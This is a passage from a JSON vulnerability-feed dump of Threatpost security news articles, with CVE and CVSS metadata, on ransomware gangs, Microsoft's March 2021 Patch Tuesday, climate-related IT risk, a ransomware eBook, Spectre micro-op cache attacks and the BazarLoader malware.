are refining their approaches to look at targets that have \u201ca higher motivation\u201d to pay ransom, cases in point being [Kaseya](<https://threatpost.com/zero-days-kaseya-unitrends-backup-servers/168180/>) and [SolarWinds](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>).\n\n\u201cRansomware groups will continue to look for attack vectors that are likely to have a higher motivation for payment, and that is the next evolution in this business,\u201d Schrader said via email. \u201cWe already see the early effects. 
Kaseya, SolarWinds, tools that promise access to high-value assets, where an organization\u2019s revenue stream and reputation depends on.\u201d\n\nSchrader thinks that VMware\u2019s recently added capability of [encrypting ESXi servers](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-8D7D09AC-8579-4A33-9449-8E8BA49A3003.html>) is \u201ca harbinger of what will come,\u201d pointing to CISA\u2019s recent alert about the top routinely exploited vulnerabilities, which included a [warning about CVE-2021-21985](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>): the critical remote code execution (RCE) [vulnerability in VMware vCenter Server](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) and VMware Cloud Foundation.\n\n\u201cIn essence, not paying a ransom is the only angle that will \u2013 over time \u2013 eradicate ransomware,\u201d Schrader said. \u201cAnd to be positioned for that, companies will have to minimize and protect their attack surface, harden their systems and infrastructure, manage existing accounts properly and delete old ones, patch vulnerabilities according to risks, and be able to operate in a cyber-resilient manner when under attack.\u201d\n\n## Where\u2019s the MBA Coursework About Ransomware?\n\nGroupSense\u2019s Fowler said that the focus has to be on prevention and mitigation before ransomware is deployed. But what about after? \u201cRansomware attacks are a cyber issue up to the point that the ransomware is executed,\u201d he pointed out. 
\u201cThen it becomes a business issue, and this presents business considerations and continuity hurdles not part of the curriculum on any MBA course I\u2019m familiar with currently.\u201d\n\n072821 16:28 UPDATE: Added input from Mike Fowler.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T18:33:02", "type": "threatpost", "title": "New Ransomware Gangs Haron & BlackMatter Are After Fat Cats", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-07-28T18:33:02", "id": "THREATPOST:6BB33156369CC57707F857196BE6B060", "href": "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). 
Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. \u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. 
The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been patched.\n\n\u201cAs we\u2019ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,\u201d according to Satnam Narang, staff research engineer at Tenable. \u201cWe strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.\u201d\n\n## **PoC Exploit Code Available For Windows Privilege Elevation Flaw**\n\nIn addition to the five actively exploited vulnerabilities, Microsoft issued a patch for a vulnerability in Win32K for which public PoC exploit code is also available. This flaw [ranks important in severity](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27077>), and exists in Windows Win32K ([CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>)). A local attacker can exploit the flaw to gain elevated privileges, according to Microsoft. While PoC exploit code is available for the flaw, the tech giant said it has not been exploited in the wild, and that exploitation is \u201cless likely.\u201d\n\n## **Other Microsoft Critical Flaws**\n\nMicrosoft patched 14 critical vulnerabilities overall in this month\u2019s Patch Tuesday updates, including [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>), which exists in Windows DNS server and can enable remote code execution. The flaw is one out of seven vulnerabilities in Windows DNS server; the other six are rated important severity. 
The critical-severity flaw can be exploited by an attacker with an existing foothold on the same network as the vulnerable device; the attack complexity for such an attack is \u201clow.\u201d\n\nA critical remote code-execution flaw also exists in Microsoft\u2019s Windows Hyper-V hardware virtualization product ([CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>)), which could allow an authenticated attacker to execute code on the underlying Hyper-V server.\n\n\u201cWhile listed as a CVSS of 9.9, the vulnerability is really only relevant to those using the Plan-9 file system,\u201d said Childs. \u201cMicrosoft does not list other Hyper-V clients as impacted by this bug, but if you are using Plan-9, definitely roll this patch out as soon as possible.\u201d\n\nAnother bug of note is a remote code-execution flaw existing on Microsoft\u2019s SharePoint Server ([CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>)). The flaw can be exploited by a remote attacker on the same network as the victim, and has a low attack complexity that makes exploitation more likely, according to Microsoft.\n\n\u201cFor an attack to succeed, the attacker must be able to create or modify sites with the SharePoint server,\u201d according to Childs. \u201cHowever, the default configuration of SharePoint allows authenticated users to create sites. When they do, the user will be the owner of this site and will have all the necessary permissions.\u201d\n\n## **Microsoft Exchange Updates: Patch Now**\n\nThe Microsoft Patch Tuesday updates come as businesses grapple with existing Microsoft Exchange zero-day vulnerabilities that were previously disclosed and continue to be used in active exploits. 
Overall, Microsoft had released out-of-band fixes for seven vulnerabilities \u2013 four of which were the actively-exploited flaws.\n\nOn Monday, the [European Banking Authority disclosed a cyberattack](<https://www.eba.europa.eu/cyber-attack-european-banking-authority-update-2>) that it said stemmed from an exploit of the Microsoft Exchange flaw. Beyond the European Banking Authority, one recent report said [that at least 30,000 organizations](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) across the U.S. have been hacked by attackers exploiting the vulnerability.\n\n\u201cIf you run Exchange on-premise, you need to follow the published guidance and apply the patches as soon as possible,\u201d said Childs. \u201cMicrosoft has even taken the extraordinary step of creating patches for out-of-support versions of Exchange. Ignore these updates at your own peril.\u201d\n\nAlso released on Tuesday were Adobe\u2019s security updates, [addressing a cache of critical flaws](<https://threatpost.com/adobe-critical-flaws-windows/164611/>), which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.\n", "cvss3": {}, "published": "2021-03-09T22:12:56", "type": "threatpost", "title": "Microsoft Patch Tuesday Updates Fix 14 Critical Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": 
["CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27077"], "modified": "2021-03-09T22:12:56", "id": "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "href": "https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:41:00", "description": "Few could have anticipated the impact COVID-19 has had on business. It spread from an isolated outbreak to a global pandemic seemingly overnight, and IT leaders across the planet have had mixed success adjusting to the changes and uncertainty it has brought.\n\nWhile COVID-19 caught many businesses off guard, smart executives are already thinking about the next global crisis and what challenges it might present for IT security.\n\n## **Climate Change: A Looming Crisis**\n\nIt\u2019s a good bet that climate change could bring forth the sequel to COVID-19. [Global climate change is once again the top threat globally according to Pew Research](<https://www.pewresearch.org/global/2019/02/10/climate-change-still-seen-as-the-top-global-threat-but-cyberattacks-a-rising-concern/>) (not surprisingly, cyberattacks are a close second), and it typically occupies top rankings on similar doomsday lists. 
The World Economic Forum did not include pandemic or contagious disease on its 2019 list of Top 10 Global Risks By Likelihood, but [climate change dominated the top three](<https://www.weforum.org/reports/the-global-risks-report-2020>) \u2014 extreme weather events, failure of climate-change mitigation and adaptation, and major natural disasters like earthquakes or volcanoes.\n\nClimate change is particularly problematic for IT because it affects confidentiality, integrity and availability \u2014 the three pillars of information security \u2014 and requires a holistic strategy.\n\nAvailability is threatened by the physical nature of climate change that forces people away from home or office and the spiraling demand for resources. Confidentiality and integrity become problematic when considering the newest technologies that organizations are implementing as part of digital transformation. Security concerns should be a leading factor when considering and deploying new technology solutions.\n\n## **Pandemic Provides Sound Guidance for the Next Crisis**\n\nWe\u2019re all still learning the lessons of COVID-19, and going forward they must be held closely, as many potential climate-change outcomes could mirror what we\u2019ve experienced since March 2020. Wildfires or flooding from supersized or rare storms, [events that have intensified in recent years](<https://www.cnet.com/how-to/deadly-fires-hurricanes-floods-heres-why-the-situation-is-getting-worse/>), would bring mass evacuations and services disruptions that drive employees to work from home and businesses to establish secure connections in order to maintain productivity.\n\nWorking from home and increased cloud adoption pose challenges and risks that must be faced proactively. 
Since fixed locations and the legacy hardware they\u2019re connected to are increasingly vulnerable, a user-centric approach to security infrastructure, like a software-defined network, is required.\n\nThere is increasing chatter around the importance of data backup in 2021, and how automated backup and disaster recovery (BDR) will be an emerging mission-critical component of data security. Considering how working from home figures to continue driving the emergence of both multi-cloud and disaster recovery as-a-service (DRaaS) ([expected to grow at 41.6 percent CAGR through 2027](<https://www.xaasjournal.com/4-bdr-trends-for-2021/>)), it\u2019s safe to say most organizations will be focused on BDR.\n\n## **Expect the Worst Intentions of Bad Actors**\n\nSimilarly, COVID-19 has given us a window into how hackers can exploit human vulnerabilities during a crisis, with [healthcare and pandemic-related attacks prevalent in 2020](<https://threatpost.com/covid-19-vaccine-cyberattacks-credentials-zebrocy/162072/>). For example, phishing emails are designed to play on emotions, so it\u2019s not surprising that the words COVID, CORONAVIRUS, masks, test, quarantine, and vaccine [appeared widely in phishing emails](<https://threatpost.com/covid-19-vaccine-spear-phishing-attacks/164489/>) this year.\n\nA climate change-related crisis with widespread disruptions would likely provide bad actors similarly ideal conditions for deception. During the first weeks of shelter-in-place for many U.S. states last March, [almost three times as many people clicked on a phishing link and provided their credentials](<https://www.intelligentciso.com/2020/09/10/what-impact-has-covd-19-had-on-the-data-breach-landscape/>) to a simulated login page than in pre-COVID-19 phishing simulations conducted the previous year. 
Taking advantage of this heightened emotional response is how opportunistic hackers succeed.\n\nThis tells us that zero-trust identity and managed security solutions, can help organizations be ready for any situation that would test their workers\u2019 vulnerabilities. The added layer of employee training and awareness could include [proven methods of phishing prevention](<https://insights.sei.cmu.edu/insider-threat/2020/01/anti-phishing-training-is-it-working-is-it-worth-it.html>) that can dramatically reduce user click rates.\n\n## **Infrastructure Will Force Companies to Look Inward**\n\nThe internet and climate change are intertwined in an anxiety-producing plot \u2014 the internet is at once a cause of climate change and one of its potential casualties.\n\nInternet-of-things (IoT) devices, which are still largely unregulated, continue to see widespread adoption, and companies are now coming online with IoT-enabled smart factories and offices running entirely on automation. Existing operational technology (OT) networks that run most of our critical infrastructure are old and difficult to truly secure, so any disruption to the internet brought by climate change, or any related cyberattacks, must be accounted for in security planning. With IoT specifically, endpoint security must be addressed.\n\nIt\u2019s difficult to envision any company\u2019s plan that does not seriously take into account its own environmental footprint. Increasingly, governments are applying more stringent standards for energy efficiency around data centers, storage and networking. This kind of effort ultimately requires global, industry-wide and company-wide cooperation, and organizations who buy in first will position themselves for success in the face of adversity.\n\n## **True Resiliency Requires Vendor Independence**\n\nA climate change-related crisis would likely impact an organization\u2019s systems in some way. 
That company\u2019s vendors would be similarly impacted and possibly unable to provide service. More than anything, climate change will require companies to improve independency so they are not so reliant on existing legacy technology or other service providers for data, security or infrastructure.\n\nCompanies must meaningfully invest in disaster recovery and business continuity, and comprehensively assess all third-party risks in order to ensure independency. This effort also requires investment in new, scalable and integrated platforms to replace legacy architecture.\n\nIt might be impossible to plan for the next global crisis. But if COVID-19 has taught us anything, it\u2019s that transformative change is possible even in the most trying circumstances. Taking threats like these seriously and making a plan is the first step to ensuring resiliency when the world changes on a dime.\n\n**_Sivan Tehila is cybersecurity strategist at Perimeter 81 and an adjunct professor of cybersecurity at Yeshiva University._**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {}, "published": "2021-04-19T15:27:38", "type": "threatpost", "title": "What COVID-19 Taught Us: Prepping Cybersecurity for the Next Crisis", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T15:27:38", "id": "THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "href": "https://threatpost.com/covid-19-prepping-cybersecurity-crisis/165472/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-21T15:41:03", "description": "Ransomware has been a growing scourge for years, but recent attacks illustrate a growing sophistication by attackers within this slice of the cybercrime underbelly. Snowballing assaults against the business sector, schools and government organizations are now a primary cybersecurity concern. 
Making matters worse is the ever-changing nature of ransomware attacks, complicating the cyber-defender\u2019s job.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nFor instance, the last 12 months have seen emerging types of extortion attempts on the part of ransomware operators. [Double-extortion efforts](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) pioneered by cyberattack groups like Maze have become standard operating procedure (stealing sensitive data and threatening to release it if a victim doesn\u2019t pay up). But beyond this, some ransomware operators, such as the [SunCrypt gang](<https://threatpost.com/revil-video-game-hit-revenue/160743/>), are mounting follow-on denial-of-service (DoS) attacks to put the screws to victims. And, other gangs are using the data they steal to mount additional attacks on the initial victim\u2019s partners or suppliers, as seen in the [Blackbaud attack](<https://gurucul.com/news/making-sense-of-the-blackbaud-ransomware-attack>).\n\nThere\u2019s also a burgeoning move [to attack cloud resources](<https://threatpost.com/cybercrime-cloud-accelerate-attacks-data-glut/161243/>) such as Kubernetes and Docker, which opens up a new threat surface and area of risk for IT security teams.\n\nKeeping up with ransomware changes can be overwhelming. 
To that end, Threatpost hopes to lend context, in-depth insights and mitigation examples with a fresh eBook to arm infosec professionals with knowledge needed to defend against not only the state of play \u2013 but also the emerging trends and attack patterns (such as those above) that are set to bubble up and take security staff by surprise in the year ahead.\n\nIn \u201c2021: The Evolution of Ransomware,\u201d a [free, downloadable PDF eBook](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), a series of in-depth feature articles explores this multifaceted threat and what\u2019s next. It kicks off with our lead story that goes beyond the ransomware status quo, and explores top emerging trends and granular insights like how ransomware code itself is changing.\n\n**_Inside This eBook:_**\n\n * Emerging Trends in Ransomware\n * A Peek Inside the Ransomware Economy\n * Cyber-Insurance Fuels Ransomware Payment Surge\n * Threatpost Poll: The Cost of a Ransomware Attack\n * Diary of a 48-Hour Ransomware Attack\n * A Practical Guide to Avoiding Ransomware\n\nWe also take a deep dive into how the [ransomware underground economy](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>) is structured and what goes on in illicit forums. Threatpost follows the money to find out how these affiliates work with ransomware operators, their code of conduct and more.\n\nInside this eBook, Threatpost also delivers an insider\u2019s view into the real-world toll that ransomware can take. 
An exclusive case study takes readers inside a fascinating incident-response event, with a diary of the first 48 hours of an attack on a [school district](<https://threatpost.com/pysa-ransomware-education-feds-warn/164832/>).\n\nOther articles include exclusive Threatpost research (based on [a reader poll](<https://threatpost.com/threatpost-poll-ransomware-security/162842/>)) that examines attitudes towards paying the ransom, how respondents said they deal with a ransomware attack and what organizations\u2019 top challenges are. We also take a critical look at the [role of cyberinsurance companies](<https://threatpost.com/mixed-sanctions-ransomware-negotiators/159795/>) when it comes to ransomware. Lastly, Threatpost offers a round-up of best practices for mitigating risk with an at-a-glance checklist for shoring up defenses.\n\nThreatpost is releasing this eBook at a time of unprecedented growth for this type of cyberattack. The number of ransomware attacks has jumped by 350 percent since 2018, the average ransom payment increased by more than 100 percent in 2020, downtime is up by 200 percent and the average cost per incident is on the rise, according to a [recent report](<https://purplesec.us/resources/cyber-security-statistics/ransomware/>) from PurpleSec.\n\nWorryingly, in a recent survey from Proofpoint, 75 percent of respondents said they have experienced a ransomware attack; victims also reported that ransom demand amounts [are up 320 percent](<https://threatpost.com/ransomware-demands-spike-payments-rise/163744/>) so far this year compared to 2020.\n\nBusinesses need to view ransomware as a future event to plan for, not a hypothetical abstract. 
Cloud services, remote workers and a reliance on connected devices [put any business at risk](<https://threatpost.com/ransomware-cheese-shortages-netherlands/165407/>) for a ransomware incident.\n\nThe polymorphic nature of ransomware crimes plays out in multiple dimensions, and paying attention to those developing trends is vital. [Download this free Threatpost eBook today](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>), to help hone a solid foundation for understanding this threat, and how to be better positioned to defend against it \u2013 both now and in the future.\n\n**Download our exclusive ****FREE Threatpost Insider eBook****,** _**\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d**_** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and ****[DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now**** \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-19T18:01:23", "type": "threatpost", "title": "Ransomware: A Deep Dive into 2021 Emerging Cyber-Risks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-19T18:01:23", "id": "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "href": "https://threatpost.com/ebook-2021-ransomware-emerging-risks/165477/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-05-05T13:59:21", "description": "All defenses against Spectre side-channel attacks can now be considered broken, leaving billions of computers and other devices just as vulnerable today as they were when the hardware flaw was [first announced](<https://threatpost.com/intel-halts-spectre-meltdown-patching-for-broadwell-and-haswell-systems/129615/>) three years ago.\n\nA [paper](<http://www.cs.virginia.edu/~av6ds/papers/isca2021a.pdf>) published on Friday by a team of computer scientists from the University of Virginia and the University of California, San Diego, describes how all modern AMD and Intel chips with micro-op caches are vulnerable to this new line of attack, given that it breaks all defenses. That includes all Intel chips that have been manufactured since 2011, which all contain micro-op caches.\n\nThe vulnerability in question is called Spectre because it\u2019s built into modern processors that perform branch prediction. It\u2019s a technique that makes modern chips as speedy as they are by performing what\u2019s called \u201cspeculative execution,\u201d where the processor predicts instructions it might end up executing and prepares by following the predicted path to pull the instructions out of memory. 
If the processor stumbles down the wrong path, the technique can leave traces that may make private data detectable to attackers. One example is when data accesses memory: if the speculative execution relies on private data, the data cache gets turned into a side channel that can be squeezed for the private data through use of a [timing attack](<https://threatpost.com/intel-side-channel-attack-data/164582/>). \n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a [writeup](<https://engineering.virginia.edu/news/2021/04/defenseless-uva-engineering-computer-scientists-discover-vulnerability-affecting>) from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction. \n\nOm Moolchandani, co-founder, CTO, CISO and research team leader at Accurics, said that this is going to be a widespread problem. \u201cAny x86 type multi-core processor could be affected: essentially all modern 32- and 64-bit PC processors and the vast majority of typical server hardware,\u201d he told Threatpost in an email on Monday. Non-x86 processors such as ARM, MIPS, and RISC V, etc. 
aren\u2019t expected to be affected.\n\n## **Back to the Drawing Board**\n\nThe findings are going to obliterate a pile of work done by those who\u2019ve been working hard to fix Spectre, the team says. \u201cSince Spectre was discovered, the world\u2019s most talented computer scientists from industry and academia have worked on software patches and hardware defenses, confident they\u2019ve been able to protect the most vulnerable points in the speculative execution process without slowing down computing speeds too much. They will have to go back to the drawing board,\u201d according to UVA\u2019s writeup. \n\nThe new lines of attack demolish current defenses because they only protect the processor in a later stage of speculative execution. The team was led by UVA Engineering Assistant Professor of Computer Science Ashish Venkat, who picked apart Intel\u2019s suggested defense against Spectre, which is called [LFENCE](<https://software.intel.com/security-software-guidance/best-practices/optimized-mitigation-approach-load-value-injection>). That defense tucks sensitive code into a waiting area until the security checks are executed, and only then is the sensitive code allowed to execute, he explained. \u201cBut it turns out the walls of this waiting area have ears, which our attack exploits. We show how an attacker can smuggle secrets through the micro-op cache by using it as a covert channel.\u201d\n\n## **Kiss That Precious Performance Goodbye**\n\nVenkat says we can think about the potential attacks as being something like \u201ca hypothetical airport security scenario where TSA lets you in without checking your boarding pass because (1) it is fast and efficient, and (2) you will be checked for your boarding pass at the gate anyway. \n\n\u201cA computer processor does something similar. It predicts that the check will pass and could let instructions into the pipeline. 
Ultimately, if the prediction is incorrect, it will throw those instructions out of the pipeline, but this might be too late because those instructions could leave side-effects while waiting in the pipeline that an attacker could later exploit to infer secrets such as a password,\u201d Venkat said. \n\nAccording to team member UVA Ph.D. student Logan Moody, the new attacks are going to pour cement shoes onto the feet of modern chips. \u201cIn the case of the previous Spectre attacks, developers have come up with a relatively easy way to prevent any sort of attack without a major performance penalty for computing,\u201d Moody said. \u201cThe difference with this attack is you take a much greater performance penalty than those previous attacks.\u201d\n\nMoolchandani described the performance drag like this: \u201cThe affected parts of the computer focus specifically on improving performance by reading information from relatively slow components such as external memory in anticipation of what will be needed. This so-called speculative execution cache greatly improves performance by ensuring that data is available when it\u2019s needed, similar to the effect of an assembly line in manufacturing. The vulnerability is in the mechanics of how that assembly line works, and any patch will necessarily affect the efficiency of that process. We intuitively know it will reduce performance, and any performance impact will be magnified because it is buried so deep in the inner workings of the processor.\u201d\n\n## **How Likely Are Attacks?**\n\nMoolchandani told Threatpost that as far as the direct impact of attacks on organizations, end-users and consumers go, the worry will concern attackers\u2019 ability to dig secrets out of the nooks and crannies of processors \u201cIt would be very difficult to create a focused attack looking for specific information,\u201d he said in an email. 
\u201cInstead, attacks are expected to take the form of passive surveillance, collecting random information. That information is collected from deep inside the processor, though, and could contain anything processed by the computer.\u201d \n\nGiven the structure of chips and this newly discovered flaw, even encryption won\u2019t save our data, he said.\n\n\u201cBecause of the way it\u2019s gathered, encrypted information is not safe from attacks \u2013 it can be collected by criminals after decryption has taken place,\u201d Moolchandani said. \u201cThey could even access arbitrary data stored on the hard drive which hasn\u2019t been accessed in a very long time. While they cannot control what information they might be able to see, attackers can still target specific organizations or domains to increase the chance of finding interesting information, for example, large e-commerce sites which process payment data, or government-aligned organizations which might process classified information, etc.\u201d\n\nThe research team reported their findings to international chip makers in April and plan to present at the International Symposium on Computer Architecture, [ISCA](<https://iscaconf.org/isca2021/>), which will be held virtually in June.\n\n5/3/21 16:11 UPDATE 1: Intel emailed the following statement to Threatpost: \u201cIntel reviewed the report and informed researchers that existing mitigations were not being bypassed and that this scenario is addressed in our [secure coding guidance](<https://software.intel.com/security-software-guidance/secure-coding/guidelines-mitigating-timing-side-channels-against-cryptographic-implementations>). Software following our guidance already have protections against incidental channels including the uop cache incidental channel. No new mitigations or guidance are needed.\u201d\n\n5/3/21 22:47 UPDATE 2: Expect this to be a heated, if virtual, debate at ISCA. 
After Intel sent out its statement, UVA\u2019s Venkat responded with this emailed response: \u201cWe\u2019re aware of these guidelines from Intel suggesting that software developers \u2026 write code in a way that is not vulnerable to side-channel attacks. Here\u2019s an excerpt from the Intel article: \u2018Developers who wish to protect secret data against timing side-channel methods should ensure that their code runtime, data access patterns, and code access patterns are identical independent of secret values.\u2019\n\n\u201cCertainly, we agree that software needs to be more secure, and we agree as a community that constant-time programming is an effective means to writing code that is invulnerable to side-channel attacks. However, the vulnerability we uncover is in hardware, and it is important to also design processors that are secure and resilient against these attacks.\n\n\u201cIn addition, constant-time programming is not only hard in terms of the actual programmer effort, but also entails high performance overhead and significant deployment challenges related to patching all sensitive software. The percentage of code that is written using Constant Time principles is in fact quite small. Relying on this would be dangerous. That is why we still need to secure the hardware.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, _\u201c_[_2021: The Evolution of Ransomware_](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)_,\u201d_ to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and[ DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-03T20:56:03", "type": "threatpost", "title": "New Attacks Slaughter All Spectre Defenses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-03T20:56:03", "id": "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "href": "https://threatpost.com/attacks-slaughter-spectre-defenses/165809/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:43:53", "description": "The BazarLoader malware is leveraging worker trust in collaboration tools like Slack and BaseCamp, in email messages with links to malware payloads, researchers said.\n\nAnd in a secondary campaign aimed at consumers, the attackers have added a voice-call element to the attack chain.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe [BazarLoader downloader](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>), written in C++, has the primary function of downloading and executing additional modules. 
